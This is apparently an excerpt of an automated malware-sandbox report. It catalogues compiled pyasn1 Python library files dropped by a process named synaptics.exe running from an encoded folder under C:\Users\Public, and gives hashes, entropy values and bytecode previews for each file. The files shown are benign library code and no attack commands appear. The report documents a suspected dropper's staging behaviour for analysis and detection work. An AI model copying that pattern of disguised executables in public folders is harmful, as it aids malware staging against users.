                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1866
                                                                                                                                                                                      Entropy (8bit):5.140358017692469
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:EjM1Beausa5bi6PPeLrNLPKcDP4h8bM8rc6826aFQc6ZLCJckPyhvc4J4XQCBf:TNkiuPWzHDwmPrS216ZOcBzAn1
                                                                                                                                                                                      MD5:80AA2BF4E2491C1C5ADA22E508F5842F
                                                                                                                                                                                      SHA1:D55EBB4021C0766A2EB265A23189718F4B646DAC
                                                                                                                                                                                      SHA-256:A9E00CC8DD8E39C53C77144E49C77C55D3DD2E394D7F35046B49EC9089688E56
                                                                                                                                                                                      SHA-512:68BB6CC55D8493DFA0DD0780179B13D9F49F4393254E753B93FA0B1696BC9A5FF1BB6874CE10A10C2FBFE1F6DE605A1189172C41DECB3817EBC51760D3F40835
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..fd........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rce.j.j.j.Z.e.d.u.rce.e.v.rce.e.e.<.qKG.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e...Z.d.e.f.d.d...Z.d.S.)......N)...decoder)...univ..decode..StreamingDecoderc....................@........e.Z.d.Z.d.Z.d.S.)...BitStringPayloadDecoderFN....__name__..__module__..__qualname__Z.supportConstructedForm..r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\der\decoder.pyr.................r....c....................@...r....)...OctetStringPayloadDecoderFNr....r....r....r....r....r........r....r....c....................@...s ...e.Z.d.Z.e.j.j.Z.e.Z.e.Z.d.Z.d.S.)...SingleItemDecoderFN).r....r....r....r....r......__doc__..TAG_MAP..TYPE_MAPZ.supportIndefLengthr....r....r....r....r....+...s..............r....c....................@........e.Z.d.Z.e.j.j.Z.e.Z.d.S.).r....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):186
                                                                                                                                                                                      Entropy (8bit):4.970663360964073
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reJl/Gtulev/Lgl2jrEsnlllPlXOaHF50YTlHX0M9VWrzL1aD67kcTgk:y/SJ0tqev/Ulcrfll+aHxEM9ArdaDuR
                                                                                                                                                                                      MD5:58B38109F770E4A2F9035A0F7D2B7167
                                                                                                                                                                                      SHA1:DA8CDA71724835F986910C5C5CBD659964BECD57
                                                                                                                                                                                      SHA-256:200AB7F0E98BAA0DFD3C42BD6E036C4D33606B924B3EAA42DB5BDCDAAC90832B
                                                                                                                                                                                      SHA-512:A9D0E911663D40E4A737ED894EF338B93B4F6F2A9D2E92B91FAE2AFBD1E512DC4F49B7588D98215FC974942EAC65C9C326B52059F3D8A144446610D187DACCD5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..fp........................@...s....e...Z.d.S.).N)...objectZ._MISSING..r....r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\compat\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):420
                                                                                                                                                                                      Entropy (8bit):4.947712956733462
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/SD//rCo/10MIPLsXSjAfNs//w0UuDPLyYpKX69ZDaHxEM9Arda1lA0ikdX+mqf:CUrC664jlsSuD2TMYlJ1lA0ikdOZqqJ
                                                                                                                                                                                      MD5:BE89AC399E10C3914A3720F906BBB003
                                                                                                                                                                                      SHA1:604D35967A4816B5205312D4DBB8BAFD9B583BC4
                                                                                                                                                                                      SHA-256:8898F245DECC62561D0966BE50E7E94543B9C527E8FE4D6BF2AFB82EB552339B
                                                                                                                                                                                      SHA-512:32728530EFDBF39DE52F8293FA86F64D686A57EE2A23352CF4AF377EB15DD3DF744CD21DF95857D26DCE9CFC626C7A01C617C730E32B7067B0ED0D6A9F9E6406
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....d.d.d...Z.d.S.).F.....c....................C...sJ...t.|.....|...}.|.r.|.d...d.k.r.|.d.7.}.|.j.|.d...|.d...r.d.p.d...d.|.d...S.).N.....r...........big)...signed)...max..bit_length..to_bytes)...valuer......length..r.....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\compat\integer.pyr........s..........$.r....N).Fr....).r....r....r....r....r......<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):163
                                                                                                                                                                                      Entropy (8bit):4.637446587638193
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reLuleh/wZWejIaHF50YTlHX0M9VWrzL1KLLikcTgp:y/SLqeh/wvIaHxEM9ArdKLLy4
                                                                                                                                                                                      MD5:44C3B18690A5BD719D8007CFE20DDF90
                                                                                                                                                                                      SHA1:BCE1A5B9B136B98D225E65E0AA509D6C7666DFA6
                                                                                                                                                                                      SHA-256:8920B60F89538BAF8C574D95E149EC1A38F03CBFE2D8300EA8BCB4062ABD4C23
                                                                                                                                                                                      SHA-512:9228977D67A3396EE293A713EF366BB67E600D5F521ADC56C10037EDA6486E9E29F200322087C38A74FFE8EFC43CAFF86D0C8B0F4EA7678543E7AC028DF8947D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f;........................@...s....d.S.).N..r....r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\type\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21823
                                                                                                                                                                                      Entropy (8bit):5.2540838186245615
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Vd+3khvV7gSPy9VQYmqBB00ygsqUxW0pmw+jg+AgSbCiFFQQVXycnS41MtOdtcVZ:VMkhvV7gSPy9VQYmqBB00ygpUxW0pmwo
                                                                                                                                                                                      MD5:48F4FC4A45D0ED4EAE0D83C6B69E0DED
                                                                                                                                                                                      SHA1:33B6767EEBB22CA53D35A67C8A8B76586019C1E1
                                                                                                                                                                                      SHA-256:5B8C8D9954C0326C35DDABECE08CFF36DD4AB2704177E588EBC2BDF2137513F6
                                                                                                                                                                                      SHA-512:79D6731BCE03340B07CBFEDC7088F5FBAA295F1B48576D6FE4996CFFE2A03433750601355768A3F50A6808BA2E386CEC238618F909C86776E76734CFE94DFB03
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f"V.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.e.Z.d.S.)......N)...error)...constraint)...tag)...tagmap)...Asn1Item..Asn1Type..SimpleAsn1Type..ConstructedAsn1Typec....................@...s....e.Z.d.Z.e.d.d.d.....Z.d.S.).r.........c....................C...s4...z.t...j.|.7..._.W.t.j.S...t.y.......|.t._.Y.t.j.S.w...N).r....Z._typeCounter..AttributeError)...cls..increment..r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\type\base.py..getTypeId....s..................z.Asn1Item.getTypeIdN).r....)...__name__..__module__..__qualname__..classmethodr....r....r....r....r....r........s..........r....c....................@...s....e.Z.d.Z.d.Z.e.....Z.e.....Z.d.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d#d.d...Z.d#d.d...Z.e.d.d.....Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d.S.)%r....a>...Base class for
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5592
                                                                                                                                                                                      Entropy (8bit):5.106088103082917
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:chAsswL3b31sUQblFm1dSGah4in/lqaW5P3ftlSCowp9yQu9MURWu3nph9K:0Asbz1s9bn3GayicaWR3f2+9ruSURWu8
                                                                                                                                                                                      MD5:3341842527492AB3BE350D9121B7D2B8
                                                                                                                                                                                      SHA1:65FF3BF5368D098AAD43A4483E35188DA6A5AB8C
                                                                                                                                                                                      SHA-256:8410532BECD12678BA7F2BDBBC8F137250A53B33524D3B4675408BD329F7C417
                                                                                                                                                                                      SHA-512:4B5EE7948C1CFF5E04154C4EB15C67F89A1520B7008A908FF1C8602BEC2E8BC7A40E994A37408EADDF7B6483B137C5526803DE909326482E9F9EA2AE40EC1601
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.$.......................@...s&...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d d!..d!e...Z.d.S.)".....N)...error)...tag)...univ)...NumericString..PrintableString..TeletexString..T61String..VideotexString..IA5String..GraphicString..VisibleString..ISO646String..GeneralString..UniversalString..BMPString..UTF8Stringc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.S.)...AbstractCharacterStringa....Creates |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Type`,. its objects are immutable and duck-type :class:`bytes`.. When used in octet-stream context, |ASN.1| type assumes. "|encoding|" encoding... Keyword Args. -----------
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23707
                                                                                                                                                                                      Entropy (8bit):5.133960794242702
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:xYMLgCqqRCO/Wsd9fTiuYOseVCTet2K4fnORtAlxkVUjNptXeW8na+MVMru:ilCNRDxBGlO3VmrfnORtUkC1eW6XMVMi
                                                                                                                                                                                      MD5:164FE8DF1F6662630EBEA6D6A85076A3
                                                                                                                                                                                      SHA1:7E28FCCE3F411E2763DE508D24C7DE4008DDE8D2
                                                                                                                                                                                      SHA-256:4D334C6F6F76A4F7D15492DB5D9F3A2542DEB026ABDAEF97C2205A91B93B1472
                                                                                                                                                                                      SHA-512:696C27A88EF3342F6C61FC182127F56D659BA9D9B980E18B5FB03FD27A810DBAAD4A4C263294740448083E3A0F3B5143C452830ABDD953EDADBE409045E26EF7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.U.......................@...s....d.d.l.Z.d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.) .....N)...error)...SingleValueConstraint..ContainedSubtypeConstraint..ValueRangeConstraint..ValueSizeConstraint..PermittedAlphabetConstraint..InnerTypeConstraint..ConstraintsExclusion..ConstraintsIntersection..ConstraintsUnionc....................@...s....e.Z.d.Z.d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d.S.)#..AbstractConstraintc....................G...s*...t...|._.|...|.....t.|.j.j.|.j.f...|._.d.S...N)...set.._valueMap.._setValues..hash..__class__..__name__.._values.._AbstractConstraint__hash....self..values..r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\type\constraint.py..__init__.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):379
                                                                                                                                                                                      Entropy (8bit):4.745014007004554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/SCYNbsu3gMlCep2AInXx9YLIKP66GS9ofaHxEM9ArdKxqXKUeh/QGD7/W+ho:CWNQEgYCeeQ2+lLxsneh/j7/W+ho
                                                                                                                                                                                      MD5:657846E168942D15778B39DA6813A1CE
                                                                                                                                                                                      SHA1:70577C3F2E1D6063894D51A68D4D5CF2A4B7FC53
                                                                                                                                                                                      SHA-256:5DBABF2CD0AA8A867B65F613F6942226D10381601742ACA92E335D2FB767EBFF
                                                                                                                                                                                      SHA-512:9D647BA35943D89FA6D25809589AD49E0E532DB1B31E2EDDD9AEB6DEB613B64F417261D6D80E73B941F9F1FA2CFFC3D87D7A8EC4AA9B3004FBD6393CDBE0EFCC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s ...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......)...PyAsn1Errorc....................@...s....e.Z.d.Z.d.S.)...ValueConstraintErrorN)...__name__..__module__..__qualname__..r....r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\type\error.pyr........s........r....N).Z.pyasn1.errorr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18330
                                                                                                                                                                                      Entropy (8bit):5.141454292684053
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:1sQFyRXOxlx+se3L2qeWNqb4UF1ducijQxfA3HtADIrt:rFWql8sgL2HWNq8UF1ducijQxf2rt
                                                                                                                                                                                      MD5:2607FBB91BA7AFE1C2C0679837F0275E
                                                                                                                                                                                      SHA1:9068A8035FCD7239DD763F5F709C1C3DC3A8E80E
                                                                                                                                                                                      SHA-256:AF5EEBF0B4F4F89EF90BD42A5FABF3760964418AF3729D400587B78E4AA51836
                                                                                                                                                                                      SHA-512:8BF0D7EED3779D76F64F510F928F16FD4353AD057D20BDACDB0DA990B40EC368295533A75855875349652B33C1BB4A46D8CB487B4352F145D0E31C64D10969E3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f3?.......................@...sx...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...error)...tag)...tagmap)...NamedType..OptionalNamedType..DefaultedNamedType..NamedTypesc....................@...s....e.Z.d.Z.d.Z.d.Z.d.Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d d!..Z.d"d#..Z.d.S.)%r....a....Create named field object for a constructed ASN.1 type... The |NamedType| object represents a single name and ASN.1 type of a constructed ASN.1 type... |NamedType| objects are immutable and duck-type Python :class:`tuple` objects. holding *name* and *asn1Object* components... Parameters. ----------. name: :py:class:`str`. Field name.. asn1Object:. ASN.1 type object. FNc....................C...s ...|.|._.|.|._.|.|.f.|._.|.|._.d.S...N)..._NamedType__name.._NamedType__type.._NamedType__na
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5471
                                                                                                                                                                                      Entropy (8bit):5.1430855289327395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:w7bLr4jGns+GAwQvrrmPzKJzXzr72HL2LWHbIGpwhShNC4nxxrWqYx5qiwd:Pjcs+GAwQTrmGh2HgWHkGOkhVnxxrahY
                                                                                                                                                                                      MD5:111CAED2B0F9667D116F4D9CA24BCE68
                                                                                                                                                                                      SHA1:4257478A84311CF6A0D608962A5443AB929BC13F
                                                                                                                                                                                      SHA-256:9C66F03251E4FCF3EED2C81E20D5DAC2266B4330A58225D0A7C3C3CDE9CE0075
                                                                                                                                                                                      SHA-512:060EC15004E05CAA35449986FD7BDC2A6A4B18037A8E065F7A79CC9E95C0889599AF0E96772E70425EBA6D7FDB59AABE5012F03DEEF2F4FB4FB818A8E5A773BE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f#........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...error..NamedValuesc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,S.)-r....a....Create named values object... The |NamedValues| object represents a collection of string names. associated with numeric IDs. These objects are used for giving. names to otherwise numerical values... |NamedValues| objects are immutable and duck-type Python. :class:`dict` object mapping ID to name and vice-versa... Parameters. ----------. *args: variable number of two-element :py:class:`tuple`.. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric value.. Keyword Args. ------------. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric valu
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10192
                                                                                                                                                                                      Entropy (8bit):5.0276603453833815
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:NOjGsnVvD7K+qqlTckRWnzSO4U/KNrNr2RPb0qn:4HnVL7/HRWnZ4U/xb0q
                                                                                                                                                                                      MD5:EFA3F70FD3C76A0DD2FEE5DAAD82EBC3
                                                                                                                                                                                      SHA1:8649831D0F29C59B90FC0E16DFA144123815ADB6
                                                                                                                                                                                      SHA-256:BEF2B4C66BFC2F0D579AFB7C3161B9B6CBCBBF2FCF4B0EDE0E0ECFD1B58EAD45
                                                                                                                                                                                      SHA-512:591F9D6B3EDA26EA2148D33A0BB4E6801B50647B5AA074E0BED64D8E392009AAD258896774F0C78F350EF96461D93E05D166CF886B1AAC04314643E6334E9CD8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.%.......................@...sd...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...error)...tagClassUniversal..tagClassApplication..tagClassContext..tagClassPrivate..tagFormatSimple..tagFormatConstructed..tagCategoryImplicit..tagCategoryExplicit..tagCategoryUntagged..Tag..TagSet.@............. ..................c....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d d!....Z.d"S.)#r....a....Create ASN.1 tag.. Represents ASN.1 tag that can be attached to a ASN.1 type to make. types distinguishable from each other... *Tag* objects are immutable and duck-type Python :class:`tuple` objects. holding three integer components of a tag... Parameters. ----------. tagClass: :py:class:`int`. Tag *class* value.. tagFormat: :py:class:`int`. Tag *format* value.. tagId: :
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3292
                                                                                                                                                                                      Entropy (8bit):5.14175646312547
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:w7uO+EKaC/KIO00QLMmp6ygy43BYEASd9uh9DYCfCEfXn+KZm667D0Kv19HpqEo:Vt0P0oyghxYwfuh9DYlaO+6HNvXHpqEo
                                                                                                                                                                                      MD5:29C87D2D6F5DDA2FB3AC9D3A1B12630A
                                                                                                                                                                                      SHA1:3F3B8823DEEE2FBCC5E509C0CE38CF04BB9031CA
                                                                                                                                                                                      SHA-256:A049246414ED36077F4D8FAD2AAD6AF7D7499CE4FCD3354D5838EDA10602B3BA
                                                                                                                                                                                      SHA-512:48A9B33C1CBBCC1809ED647A26422A81981EB8082D1724BE456D17CAFB2BE09E626D048A6DEA1B8EFA7369FDBD1F4FD81608551D4B22A09BBA8D3980B8C8340C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...error..TagMapc....................@...sv...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....aF...Map *TagSet* objects to ASN.1 types.. Create an object mapping *TagSet* object to ASN.1 type... *TagMap* objects are immutable and duck-type read-only Python. :class:`dict` objects holding *TagSet* objects as keys and ASN.1. type objects as values... Parameters. ----------. presentTypes: :py:class:`dict`. Map of :class:`~pyasn1.type.tag.TagSet` to ASN.1 objects considered. as being unconditionally present in the *TagMap*... skipTypes: :py:class:`dict`. A collection of :class:`~pyasn1.type.tag.TagSet` objects considered. as absent in the *TagMap* even when *defaultType* is present... defaultType: ASN.1 type object. An ASN.1 type object callee *TagMap* returns for
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):93765
                                                                                                                                                                                      Entropy (8bit):5.299547981675023
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:ZlVBPPmHi1lw8zdxtKNaRdsSxRQxZvzEIAYWTJdqH/uN6xjjQT/8kKXDlCydymtD:ZPw8pxtKNaRdsSxRQxZvzEIAYWTJdqH1
                                                                                                                                                                                      MD5:EFBC94614DFE3B7BE134E803E3D8A449
                                                                                                                                                                                      SHA1:ECFCFABC416BB9B3427FF75A584FDE5FDD418287
                                                                                                                                                                                      SHA-256:5BC42269EAC069C22C4AC5280A41074FCAA546BDEE1677A426AA02497B602206
                                                                                                                                                                                      SHA-512:60F8D7640148126C3062AF068C600096E1D895EB46A8A4AD317D7D009BC2BC8338E3AA0FFF333195E41B4E87891E3B04A062A56F5F23ED0FFAEDA7D0ED29C31B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.e...Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z G.d$d%..d%e...Z!G.d&d'..d'e.j...Z"G.d(d)..d)e"..Z#G.d*d+..d+e"..Z$G.d,d-..d-e$..Z%G.d.d/..d/e...Z&d.S.)0.....N)...error)...eoo)...integer)...base)...constraint)...namedtype)...namedval)...tag)...tagmap)...Integer..Boolean..BitString..OctetString..Null..ObjectIdentifier..Real..Enumerated..SequenceOfAndSetOfBase..SequenceOf..SetOf..SequenceAndSetBase..Sequence..Set..Choice..Any..NoValue..noValuec....................@...s....e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.e.....Z.e.....Z.e.j.....Z.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4395
                                                                                                                                                                                      Entropy (8bit):5.429031595596657
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:SHaqgsjPefkBzr3Acd0XPSWhXgxTdeqTALFI8WoTFfI7YHpiZA:VTKIklA00/Sc6nTgFIDoJg7YHJ
                                                                                                                                                                                      MD5:1B2C7E937CC630E66E7859AA7DDB5372
                                                                                                                                                                                      SHA1:B66619813F1956029CF415A9F203054024FFEA16
                                                                                                                                                                                      SHA-256:AC519C63B171A0554E7FB2A5FCFE72ACE87C910A474349F6EF7D0F2F7184352A
                                                                                                                                                                                      SHA-512:F87483A9D6D4135F69BD976595F79502BD1BB45BFF47A8BF073EE094308E2C0C470CE9D2A251A3380B54CC5BD936136203F3D4AA8E9CB60822151F9C5CEE2864
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.d.S.)......N)...error)...char)...tag)...univ)...ObjectDescriptor..GeneralizedTime..UTCTimec....................@...s:...e.Z.d.Z.e.j.j.Z.e.j.j...e...e.j.e.j.d.....Z.e.j.....Z.d.S.).r.........N)...__name__..__module__..__qualname__r......GraphicString..__doc__..tagSet..tagImplicitlyr......Tag..tagClassUniversal..tagFormatSimple..getTypeId..typeId..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\type\useful.pyr........s................r....c....................@...sL...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.e...Z.e.d.d.....Z.e.d.d.....Z.d.S.)...TimeMixIn.....Fc....................@...s2...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.TimeMixIn.FixedOffsetz&Fixed offset in minutes east from UTC.r......UTCc....................C...s....t.j.|.d...|._.|.|._.d.S.).N)...minu
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3904
                                                                                                                                                                                      Entropy (8bit):5.791321651011868
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:QqPoGNOeYVGivMhhFJQlIgSdAhoFpVaxdses42WQXIBmPriV7:RP8MhqKgSehldFQYBJh
                                                                                                                                                                                      MD5:7685397CF789DFC37312B8EAF3555C09
                                                                                                                                                                                      SHA1:7735A67F384F99F3E0329AE5A6ED718623398BD7
                                                                                                                                                                                      SHA-256:A6AA7A8B53FDFD6CA9EA5F66141887813FD8D85A9AE5EC14BA32B8EB0D29077B
                                                                                                                                                                                      SHA-512:127DBD0D8E23DBE8BFEC36D35018DFDFA682A782E6DE47E21A1EB3B2BF190434BFFDC870C3E814711E7735927BC227A96939C3AC47FAB1D719B2F3FF6011B783
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
